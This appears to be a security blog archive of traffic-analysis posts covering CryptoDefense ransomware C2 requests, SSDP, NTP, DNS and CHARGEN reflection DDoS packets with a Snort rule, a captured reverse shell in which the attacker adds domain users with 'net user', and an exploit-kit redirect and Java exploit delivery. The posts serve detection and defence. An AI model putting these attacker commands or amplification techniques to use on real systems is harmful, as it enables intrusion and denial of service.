Author Archives: admin

CryptoDefense Ransomware PCAP Traffic Sample Malware – How to decrypt your files

Cryptolocker-Lock

 

 

Solution – Step 1 – Install this free trial of Kaspersky to remove the malware

 

Solution – Step 2

Don’t pay the ransom, there is a solution for CryptoDefense and CryptoLocker, this below is from bleepingcomputer.com

How to restore files encrypted by CryptoDefense using the Emsisoft Decryptor

If you were infected before April 1st, 2014 then you may have been infected with a variant that mistakenly left the private decryption key behind on the computer. To begin please download decrypt_cryptodefense.zip from the following URL and save it to your desktop.

http://tmp.emsisoft.com/fw/decrypt_cryptodefense.zip

 

Here is a sample of what the network traffic looks like, traffic sample donated by one of our subscribers:

 

 

Cryptodefense

 

POST /dhcpshm1b8he4y HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Connection: Close

Content-Length: 88

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)

Host: machetesraka[.]com

Cache-Control: no-cache

 

y=b235aj04825c514b4995676755202a2dc9ccb1dbe13d4e69035dsdg36473f9122eecdefe948c341ba718b1

 

 

POST /a9he8f4z2j332 HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Connection: Close

Content-Length: 88

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)

Host: machetesraka[.]com

Cache-Control: no-cache

 

z=a832jf842084b936eb1327f8eee774ca252373e9f93c44e7420f3909f2e569a0b772f033a904e8cc767b6c

 

POST /bwadw33tbbae2 HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Connection: Close

Content-Length: 88

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)

Host: machetesraka[.]com

Cache-Control: no-cache

w=ccc346456aef8320d4ab3c64e26b9e1576cf4289d05bbsdrr3452bbc16576045eaf5e8aa5aa5937452baj3

 

POST /3lt1ojfs8yz HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Connection: Close

Content-Length: 88

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)

Host: machetesraka[.]com

Cache-Control: no-cache

 

z=eeeesf352aa235b2b1e5cd6dbad353213699923jbaej4e7643jfjseeb6d4860f51d24daf1144ffdc98456b

 

Share Button

SSDP Distributed Reflection Denial of Service (DrDoS) Attacks may be biggest threat – Traffic Sample & Snort Rule

SSDP Distributed Reflection Denial of Service attacks are on the rise and may be the biggest threat right now. SSDP attacks do not have the biggest amplification number but they may have the most vulnerable systems to abuse in a reflection attack. Open source reports indicate that there are over 5 million vulnerable systems worldwide as of August 2015. One of our dedicated servers was attacked by this DoSnet earlier this morning. We detected over 155,000 unique IP addresses involved in the attack and bandwidth spikes from 100MB/sec to 500MB/sec. The actual statistics are not confirmable as there was massive packet loss. So what does this attack look like? Here is a few packets with source IP addresses stripped out as to not help attackers to add to their DrDoSnets.

2015-08-22 02:09:11 IP 1.1.1.1.1900 > 192.168.1.108.80: UDP, length 259

….E…..@.8….3….w..l.P….HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:upnp:rootdevice

USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

2015-08-22 02:09:11 IP 1.1.1.1.1900 > 192.168.1.108.80: UDP, length 268

….E..(..@.8….3….w..l.P..DSHTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

….E…..@.6….v.S..w..l.P…CHTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100

Cache-Control:max-age=1800

ST:upnp:rootdevice

USN:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100::upnp:rootdevice

….E..g..@.8.

..3….w..l.P.S..HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1

USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::urn:schemas-upnp-org:device:InternetGatewayDevice:1

….E..(..@.6….v.S..w..l.P…

HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100

Cache-Control:max-age=1800

ST:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100

USN:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100

….E(.!w.@.:…..M…w..l.P.^M+UHTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.254:5431/dyndev/uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0

Cache-Control:max-age=1800

ST:upnp:rootdevice

USN:uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0::upnp:rootdevice

….E(.*w.@.:…..M…w..l.P…=HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.254:5431/dyndev/uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0

Cache-Control:max-age=1800

ST:uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0

USN:uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0

….E..g..@.6….v.S..w..l.P.S{.HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100

Cache-Control:max-age=1800

ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1

USN:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100::urn:schemas-upnp-org:device:InternetGatewayDevice:1

….E…w.@.7..Dl(….w..l.P….HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:upnp:rootdevice

USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

….E..(..@.8.. .3….w..l.P….HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:uuid:0000b018-d0a0-00b0-f0a0-486801b8f8d8

USN:uuid:0000b018-d0a0-00b0-f0a0-486801b8f8d8

….E.._..@.6….v.S..w..l.P.K.%HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100

Cache-Control:max-age=1800

ST:urn:schemas-upnp-org:service:Layer3Forwarding:1

USN:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100::urn:schemas-upnp-org:service:Layer3Forwarding:1

….E…`.@.8..F.7H…w..l.P..MZHTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:upnp:rootdevice

USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

….E(.iw.@.:…..M…w..l.P.U#.HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.254:5431/dyndev/uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0

Cache-Control:max-age=1800

ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1

USN:uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0::urn:schemas-upnp-org:device:InternetGatewayDevice:1

….E… .@.9.:.l*} ..w..l.P..Z.HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:upnp:rootdevice

USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

….E…..@.8…l^M.0..w..l.P… HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:upnp:rootdevice

USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

….E..(..@.6….v.S..w..l.P… HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100

Cache-Control:max-age=1800

ST:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4101

USN:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4101

….E…Bk@.8.i.d 5…w..l.P….HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:upnp:rootdevice

USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

….E..O..@.8.

..3….w..l.P.; *HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:urn:schemas-upnp-org:device:WANDevice:1

USN:uuid:0000b018-d0a0-00b0-f0a0-486801b8f8d8::urn:schemas-upnp-org:device:WANDevice:1

….E..gw.@.7…l(….w..l.P.S

3HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1

USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::urn:schemas-upnp-org:device:InternetGatewayDevice:1

….E….[@.7.qrl(….w..l.P..+^HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:upnp:rootdevice

USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

….E(.*w.@.:…..M…w..l.P…gHTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.254:5431/dyndev/uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0

Cache-Control:max-age=1800

ST:uuid:0000e0f8-20a0-00e0-80a0-48b801582808

USN:uuid:0000e0f8-20a0-00e0-80a0-48b801582808

….E..( .@.9.:.l*} ..w..l.P…8HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

….E…’.@.8….<….w..l.P…~HTTP/1.1 200 OK

Server: Custom/1.0 UPnP/1.0 Proc/Ver

EXT:

Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

Cache-Control:max-age=1800

ST:upnp:rootdevice

USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

You can see that the source port for the attack is 1900, make sure your systems have that port blocked by your ACL. If you want to detect this type of attack on your network it is very simple writing a Snort rule, here is a sample SSDP DrDoS attack snort rule:

Alert udp any 1900 -> $HOME_NET any (msg:”Possible SSDP DrDoS attack”; content:”Location:http:”; content:”USN:uuid:”; reference:url,www.computersecurity.org; sid:1234; rev:1;)

That is overkill but should work just fine; you could add a threshold modifier or an offset, depth and distance but a few content matches should do the trick.

Share Button

Converted PCAP sample of a Microsoft Windows Reverse Shell

Converted PCAP sample of a Microsoft Windows Reverse Shell, the shell is spawned on port 4444, the hacked PC initiates the connection to 192.168.1.109 which has a Netcat listener waiting on port 4444 to spawn a command line shell on connect. You can see once the shell is spawned a user is created and added to the domain. This style of reverse shell is not seen as much as it once was, in the older days many individuals and companies ran Remote Desktop on port 3389 and left it open to the public allowing hackers to create users and login directly to the machine as if they were there. If you are going to run RDP, you need to make sure you ACL it to only your internal network or trusted users and use encryption.

 

2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 1:37, ack 1, win 238, length 36
E..L…….
.#…sQ…….P…….Microsoft Windows [Version 6.0.6001]
2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 1:37, ack 1, win 238, length 36
E..L……
.#…sQ…….P…….Microsoft Windows [Version 6.0.6001]
2015-01-19 12:37:15 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [.], ack 37, win 16551, length 0
.#.(7.@.x.. .
.<..s……Q…P……….
2015-01-19 12:37:15 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [.], ack 37, win 1651, length 0
.#.(.@.x.. .
.<..s……QP.@…..
2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 37:117, ack 1, win 248, length 80
E..x..@…..
…sQ…….P…….
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows>
2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 37:117, ack 1, win 252, length 66
E..x..@…..
.#…sQ…….P…….
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows>
2015-01-19 12:39:19 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 1:49, ack 117, win 16531, length 48
.#.X7.@.x….
.<..s……Q..0P.@…..net user Chris.James Pwnz3d /add /domain
2015-01-19 12:39:19 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 1:49, ack 117, win 16531, length 48
.#.X7.@.x….
.<..s……Q..0P.@…..net user Chris.James Pwnz3d /add /domain
2015-01-19 12:39:19 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 49:51, ack 117, win 16534, length 2
.#.*7.@.x….
.<..s……Q..0P.@…..
….
2015-01-19 12:39:33 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 51:100, ack 180, win 16515, length 49
.#.Y7.@.x….
.<..s……Q..oP.@…..net user Josh.Brown Pwnz3d /add /domain
2015-01-19 12:39:33 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 51:100, ack 180, win 16515, length 49
.#.Y7.@.x….
.<..s……Q..oP.@…..net user Josh.Brown Pwnz3d /add /domain
2015-01-19 12:39:50 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 333:385, ack 152, win 258, length 52
E..\!.@….
.#…sQ…….P…….The command completed successfully.

C:\Windows>
2015-01-19 12:39:50 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 333:385, ack 152, win 258, length 52
E..\!.@….
.#…sQ…….P…….The command completed successfully.

Share Button

Massive Distributed Reflection Denial of Service (DrDoS) DoSNETs for hire – NTP, Chargen, SNMP, SSDP, DNS

DDoS attacks with a few thousand infected windows PCs SYN flooding a network have been taking a back seat to the next generation of Denial of Service attacks, known as Distributed Reflection Denial of Service (DrDoS) attacks. A packet kiddie doesn’t even need to compromise servers and PCs anymore to launch an attack. Many of the administrators of the servers being utilized in the attacks have little awareness they are partaking in an attack. Reflection attacks actually are not something new to the world of network security, you may have heard of the original amplification attack “smurf”.  In a smurf attack large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim’s spoofed source IP are broadcast to a computer network using an IP Broadcast address. Most devices on a network would, by default, respond to this by sending a reply to the source IP address. This attack was so devastating that several non-profit organizations began making awareness of the issue, one in particular was netscan.org which when began published over 122,945 misconfigured networks that would respond to spoofed ICMP echo request, by 2005 the number was down to a few thousand with minimal responses from each network.

Here is a snapshot of what the internet looked like in early 2000, the chart below shows the broadcast address and the amount of times it will respond to a single ping request:

Last rescan: Thu Feb 24 10:15:39 PST 2000

 

RESP      ADDR               EMAIL ADDRESSES

———————————————————————

124273    208.158.191.0

27545     210.45.224.255

12501     193.76.71.0

10679     202.178.229.0

10483     200.255.9.0

9818      210.72.81.0

9617      207.34.70.0

8176      207.112.112.0

7222      207.112.112.255

6681      206.130.55.0

6316      206.130.55.255

6003      210.243.91.255

5358      208.192.16.255

4658      209.132.220.255

4413      206.144.34.255

4207      206.144.35.255

3146      207.34.70.255

2418      170.118.254.0

2416      170.118.254.255

 

And a snapshot as of today from Powertech.no who has kept Netscan’s operation going:

Current top ten smurf amplifiers (updated every 5 minutes)
(last update: 2015-08-09 20:01:02 CET)

Network             #Dups  #Incidents  Registered at     Home AS

212.1.130.0/24         38           0  1999-02-20 09:41  AS9105

204.158.83.0/24        27           0  1999-02-20 10:09  AS3354

209.241.162.0/24       27           0  1999-02-20 08:51  AS701

159.14.24.0/24         20           0  1999-02-20 09:39  AS2914

192.220.134.0/24       19           0  1999-02-20 09:38  AS685

204.193.121.0/24       19           0  1999-02-20 08:54  AS701

198.253.187.0/24       16           0  1999-02-20 09:34  AS22

164.106.163.0/24       14           0  1999-02-20 10:11  AS7066

12.17.161.0/24         13           0  2000-11-29 19:05  not-analyzed

199.98.24.0/24         13           0  1999-02-18 11:09  AS6199

 

Netscan offered a script that checked the number of times that x.y.z.0 and x.y.z.255 reply to a single ping packet. If either number is greater than 1, the network is misconfigured and its administrator should be notified. Networks responding more than 10 times per ping were likely to be used in smurf broadcast amplifier lists. Netscan shut its doors after helping to eliminate the number of available networks to be abused in smurf attacks. Some organizations criticized Netscan for publishing the lists of networks being used in attacks (an attacker could simply copy the vulnerable networks into a list and use them in an attack) but they will always be remembered as the ones who saved the internet.

 

In today’s world there are a whole new set of protocols that can be abused in reflection attacks. A snapshot of 2015 with the protocol and amplification factor charted below:

 

UDP-based Amplification Attacks
Protocol Bandwidth Amplification Factor
NTP 556.9
CharGen 358.8
DNS up to 179
QOTD 140.3
Quake Network Protocol 63.9
SSDP 30.8
Kad 16.3
SNMPv2 6.3
Steam Protocol 5.5
NetBIOS 3.8
BitTorrent 3.8

 

There are no organizations publishing lists of known misconfigured protocols these days as that might result in lawsuits and jail time as denial of service attacks are not taken lightly anymore.

DNS amplification attacks:

  1. This type of attack takes advantage of open or misconfigured DNS servers that respond to outside recursive DNS queries. In this type of attack it does not matter if the nameserver is authoritative or not, the DNS servers will respond to any queries regardless. In a reflection attack the attackers have the ability to create a TXT record attack which will associate arbitrary and non-formatted text to a domain or host to amplify the size of the response.
  2. Reflection/Amplification based on authoritative or non-authoritative name servers. If the nameserver is an authoritative name server for the domain being queried. The attacker issues a DNS ANY query which retrieves all cached records available for the domain name and the attacker spoofs the reply to be sent to the victim. Furthermore, RFC 2671 makes it possible to increase the buffer size of the request. If the requestor-side specification of the maximum buffer size is changed responders can be made to send messages which are too large for intermediate gateways to forward thus leading to potential ICMP storms between gateways and responders.
  3. An “A record attack” occurs when an attacker issues multiple queries for A records to victim DNS servers, the request have malformed domain names so the DNS server responds with registry code or RCODE. Large numbers of these queries from a large number of sources can create devastating results.

Simple Network Management Protocol (SNMP) DrDoS attacks

SNMP operates at layer seven (application layer) to manage devices such as routers, switches, VoIP, video systems and other devices. SNMP will transmit data about the devices it has records for and can even be used to manage some devices. SNMP is broken into three parts, the device, the agent which are software modules that are within the devices and collect various info and the management software which does just like you’d think, maintains and manages records for all devices it manages.

 

SNMP uses UDP port 161 to transmit messages and 162 to catch or “trap” messages. There are three versions of SNMP, v1,v2 and v3. SNMPv2 and v3 use additional protocol data units which are “GetBulkRequest” and “InformRequest”. Since SNMP is transmitted using UDP, IP address spoofing is possible as it is a stateless protocol.

 

The DrDoS is performed after an attacker scans the internet for SNMP hosts and their community strings. Using this information the attacker can send a BulkGetRequest which is around 100 bytes and the response from the SNMP server is around 400 bytes an amplification ratio around 1:4. Attackers can also use the GetBulkRequest and enumerate all the Management Information Bases (MIBs) which can increase the amplification ratio to around 1:7 making it far more efficient for DrDoS attacks.

 

Network Time Protocol (NTP) DrDoS attacks

NTP uses UDP port 123 to synchronize computer time clocks, specifically network clocks using a set of clients and servers. Attackers scan and build a database of NTP servers that respond to outside request (they should be ACL’d to prevent abuse). The attacker issues an NTP mode 7 command which request a “monlist” which is a function built into the protocol for monitoring. There is a packet size minimum set fourth in the RFC which returns a more even response for the request. Attackers can circumvent this restriction by removing the padding from the request allowing them to issue the monlist request with a much smaller request. The request without padding was calculated at 60 bytes while the response returned 2604 bytes giving this attack a whopping reflection multiplier of 43:1.

 

Character Generator Protocol (CHARGEN) DrDoS attacks

CHARGEN uses TCP and UDP, the TCP generator service is not vulnerable to amplification attacks as the connection is oriented. The UDP based CHARGEN service listens on port 19 for incoming datagrams, when one is received the server answers with a random number of characters between zero and 512. This means the attacker will not be able to always successfully amplify the response but more often than not it will be. Open source information estimates an average reflection multiplier of about 17.

 

Here is an actual example of what a CHARGEN attack looks like in a packet:

2015-04-16 06:17:16.392098 IP 180.189.3.34.61997 > 192.168.1.103.9315: UDP, length 443

.>..E…26..q……”…..-$c..w

!”#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg

!”#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh

“#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi

#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij

$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk

%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl

 

2015-04-16 06:17:16.393881 IP 180.189.3.34.61997 > 192.168.1.103.9315: UDP, length 443

.>..E…27..q……”…..-$c..w

!”#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg

!”#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh

“#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi

#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij

$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk

%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl

 

2015-04-16 06:17:16.398694 IP 180.189.3.34.61997 > 192.168.1.103.9315: UDP, length 443

.>..E…2<..q……”…..-$c..w

!”#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg

!”#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh

“#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi

#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij

$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk

%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl

 

 

In the wild there have been reports of NTP DoSNETs attacking with over 100GB/S, SNMP DoSNETs capable of 40 GB/S, DNS attacks at 10 GB/S, CHARGEN DoSNETs at about 20MB/S. If one attacker or group of attackers can leverage all of these types of attacks at the same time it would be devastating to virtually any server on the net. Currently, you can buy or rent these DoSNETs on the hacker underground forums and IRC channels for as little as $5 for a 30 minute attack.

Share Button

Detailed Analysis of the processes and stages of an Exploit Kit – Java and IE exploited by Flashpack Web Based Kit

Here you can see the webpage that the hackers exploited (arksylhet.com/A67iD4eo/index.html) and inserted within that page an iframe which includes a link to a Javascript Redirect file

 
2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394
E…*.@…….j.\+lF…P7_Z.X.X.P….?..GET /Lk1SsGQm/js.js HTTP/1.1
Host: web63.server77.publicompserver.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html

2012-09-18 22:41:42.119368 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [P.], seq 1:473, ack 396, win 64239, length 472
E…_…….\+lF..j..P..X.X.7_\|P…D…HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 19 Sep 2012 02:31:59 GMT
ETag: “894002-47-4ca04cfa1a5c0″
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

document.location=’http://69.194.193.34/links/systems-links_warns.php’;   <—  The Javascript file simple contains a document.location variable that redirects the user to the landing page of the exploit kit

Redirection to the landing page, note that the referer below is the same link the Javascript had coded in it

2012-09-18 22:41:43.962836 IP 192.168.106.131.1414 > 69.194.193.34.80: Flags [P.], seq 1:540, ack 1, win 64240, length 539
E..C*@@….d..j.E..”…P.=1.v…P…J:..GET /links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07 HTTP/1.1
Host: 69.194.193.34
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://69.194.193.34/links/systems-links_warns.php
The victim is instructed to request the file “java.jar” which is a Java archive file containing the exploit for the vulnerable version of Java (1.7.0_06)
2012-09-18 22:41:47.553965 IP 192.168.106.131.1415 > 69.194.193.34.80: Flags [P.], seq 1:274, ack 1, win 64240, length 273
E..9*a@….M..j.E..”…P.?.GA.*.P…….GET /data/java.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive <— MIME TYPE
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06  <— Vulnerable version of Java
Host: 69.194.193.34
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
2012-09-18 22:41:48.092307 IP 69.194.193.34.80 > 192.168.106.131.1415: Flags [P.], seq 1:234, ack 274, win 64240, length 233
E…`#……E..”..j..P..A.*..?.XP…;3..HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:42:01 GMT
Content-Type: application/java-archive
Connection: keep-alive
Content-Length: 33010
Last-Modified: Tue, 18 Sep 2012 07:17:22 GMT
Accept-Ranges: bytes

 

So, at this point the victim has been redirected to the exploit kit site and an exploit has been delivered, how do we know the exploit kit did its job?

Below is the proof in the pudding, this is the request for a malicious executable file, we know that because there is no longer a referer in the GET request, the User-Agent will still be for Java and lastly the “accept-encoding: pack200-gzip, gzip” will not be in the request for the malicious file. 

